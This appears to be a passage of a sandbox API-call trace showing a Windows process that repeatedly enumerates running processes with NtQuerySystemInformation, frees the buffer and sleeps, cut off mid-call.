[0137.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.768] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.784] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.814] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.830] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.851] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.860] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.911] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.924] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.973] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.003] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.050] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.064] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.110] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 